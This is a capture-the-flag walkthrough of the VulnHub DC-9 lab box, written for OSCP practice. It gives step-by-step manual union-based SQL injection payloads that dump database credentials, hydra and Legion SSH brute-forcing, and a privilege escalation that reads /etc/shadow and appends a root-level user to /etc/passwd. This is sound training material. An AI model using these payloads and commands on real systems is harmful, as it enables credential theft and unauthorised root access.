VulnHub: DC 9 — Writeup w/o Metasploit | w/o sqlmap

VulnHub : DC-9

This is DC-9 a Linux box (1/35) from VulnHub for the preparation of OSCP from
TJ Null’s OSCP like boxes.

I was able to do SQL Injection and extract credentials.
If were/are dependent on sqlmap for SQLi attacks continue reading this article. This will help to overcome the dependency from sqlmap.

I was avoiding the use of sqlmap as this is not allowed in OSCP.

Setup

Initially, after importing the machine in VMware the network connection will be in Bridged mode. I prefer to have it in NAT. And generate MAC address and keep note of it. It will help us later to discover the machine in the network.

with netdiscover I got the machine IP. It was 192.168.37.141

$ sudo netdiscover -i eth0

Reconnaissance

Starting with rustscan.

$ rustscan --range 1-65535 -a 192.168.37.141 -- -A | tee rustscan.log

I have removed additional verbose info. And here is the output.

Open 22
Open 80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBUMktzMv7ipONz4heOtaM2+kptMq+ciaCi2jMoQfB5mAq3Kaj3lPC7X3FMI8DE6MNE3ZrdHemNYySfdkbJPAwf0dcuyUeuZIRhBeXyeqBiuHYhXXMx2VHdyFZ5s7lPN2zLqJLJe8AXnGcjGYYzTotuvV/Q/Du/M1BBq58bY65OBQb24eOiK4kKfJtzsNGaxx0sWiSWalnWClWKpR9a2ZtQ0aeSSZN5JqKLhfB/xEliZ8m58PfePDpMQ3WYsrx99nrAMJjkBvuSq/+pcUGTeS9d4zttZdZXa2ZKftbf9OVckE7Q68hZicST2osJK7l4WbIKsKQPafbqcjc1S3CRHQH
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBN0zAt7hNim31gFvf0hpObKe2MZhQrvUeUYVX5tLpXdNOGLcx4YAJnrNMuoSnHsJdVZyl8niUUVmWh9iD2FzZs=
| 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJkA7RwT1mDoxAxogU6QZ26Nbq+0PYGFRdnUNW1Zwd8C
80/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Completed NSE at 17:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds
  • Port 22 was running ssh service OpenSSH 7.9p1 Debian 10+deb10u1
  • Port 80 was running HTTP server Apache/2.4.38 (Debian)
  • OS: Debian 10

nmap vuln script scan gave me alot of exploit suggestions. I was overwhelmed and afraid with this much suggestions of exploit. I will try them later.

$ nmap -A --script=vuln -p 22,80 192.168.37.141

Enumeration

I started gobuster in the background with seclist wordlist. And I started manually looking in the website.

$ gobuster dir -w  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.37.141/ -x php,html,txt,json,bak,js | tee dirs.log
Home page / index page

There was a list of user information in Display All Records.
The search page was extracting info from All records part.
It was giving results with SQLi payload with no errors. SQL injection may work here.

I took a lot of help from this blog gotrootid. As I am not expert in sql-injection.
I have used his work and summerized alot of stuffs here.

  • A simple SQL injection is giving away all the results and it didn’t gave errors.
mary' or 1=1 -- -
  • There was a possibility that we can get all the column details; we can use the query “ORDER BY” starting with 1 and incrementing it until we get an error.
mary' order by 1 -- -
mary' order by 1,2 -- -

I was getting any results until 7. From this, we can conclude that there are 6 columns in the present table.
Now, we have to get the column number from DB. For that we can use:

mary' union all select 1,2,3,4,5,6 -- -

From the screenshot, can see the column numbers and column names.
This was unexpected. Now we can try to get the version details.

We can pass the parameter @@version to this query as follows:

mary' union all select 1,2,3,4,@@version,6 -- -

This gives a confirmation that it is running MariaDB 10.3.17. And it also gives us hope that we can fetch more data and idea about creation of SQL queries.

This is the query used to list the databases:

mary' union all select 1,2,3,4,schema_name,6 from information_schema.schemata -- -

Out of this most useful DB seems to be Staff and users.
Now for enumerating all the tables we can use

mary' union select all 1,2,3,4,table_name,6 from information_schema.tables -- -

This gave a long list of table info.
Now we know the most useful tables are StaffDetails, Users & UserDetails.

Now for listing columns in UserDetails we can use

mary' union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='UserDetails' -- -

And it gave the most useful information about columns. From now we can combine queries with these column names. The most useful out of them is username & password.

As these were not visible on the Display All Records page.

To display the username and password in other columns that the PHP page is giving us. We have to concatenate them. We can use this SQL query.

mary' union all select 1,2,3,concat(username),concat(password),6 FROM users.UserDetails -- -

Now because we have queried for mary and used the union to get other usernames and passwords in the 4th and 5th column we got all the usernames and passwords.

None of them are hashed.

After this, looking into the Users table. We got the admin’s password.
It was hashed with MD5 hash. I used crackstation to de-hash it.

mary' union all select 1,2,3,concat(username),concat(password),6 FROM Users -- -

From the users table, we have got a long list of usernames and passwords.
And with the admin credential, I was just able to login into the application as admin. In the bottom of the page it says, “File does not exist”

On trying basic LFI like ?file=.bash_history and ?file=.bashrc
got nothing.

Exploitation

SSH port is already open.
From the username and password we got from SQL query injection and after curating it into the list I used them in hydra to brute force SSH.

$ hydra -l username.lst -P passwords.lst 192.168.37.141 ssh | tee hydra.ssh.log
Hydra on ssh service

Strangely, I didn’t get any results. But in the walkthrough hydra gave the correct credentials for SSH. Then I tried legion.
I have no idea why hydra didn’t work.
Tip: untick Exit on first valid.

I was able to login with all the credentials. I didn’t got anything usefull with those accounts. Everything else was restricted. I had to find something for privilege escalation.
Finally with janitor:Ilovepeepee I got more list of passwords. I added the same in existing list of passwords and ran Legion one more time.

Then I got a new set of credentials for ssh. fredf:B4-Tru3–001

Legion Output for SSH brute force.

Privilege Escalation | Post Exploitation

After ssh login with fredf:B4-Tru3–001
I saw a very interesting binary that we can be executed as a root.

On execution of this program, it needed parameters.
Something to read and something to append into.

$ sudo /opt/devstuff/dist/test/test /etc/shadow /tmp/myshadow

To become root we can add more user or we can crack root hashes to get the passwords. A new salted password can be created with Perl as follows:

perl -le 'print crypt("mystrongpassword","salt")'

And after this, we have to add a new user to the shadow file. Initially, we can save it to a temp file. And with the binary test, we can append it to the shadow file.

$ echo "newroot:samIllSUTVKpo:0:0:Similar_to_root:/root:/bin/bash" > /tmp/newuser$ sudo /opt/devstuff/dist/test/test /tmp/newuser /etc/passwd

And finally the box is rooted.

If you liked my writeup and wanna support me just click on below orange button and buy me a coffee. :)
Happy Hacking..!!

Cyber Security Enthusiast.⁣ Preparing for OSCP.⁣ Analyst by day. Hacker by night.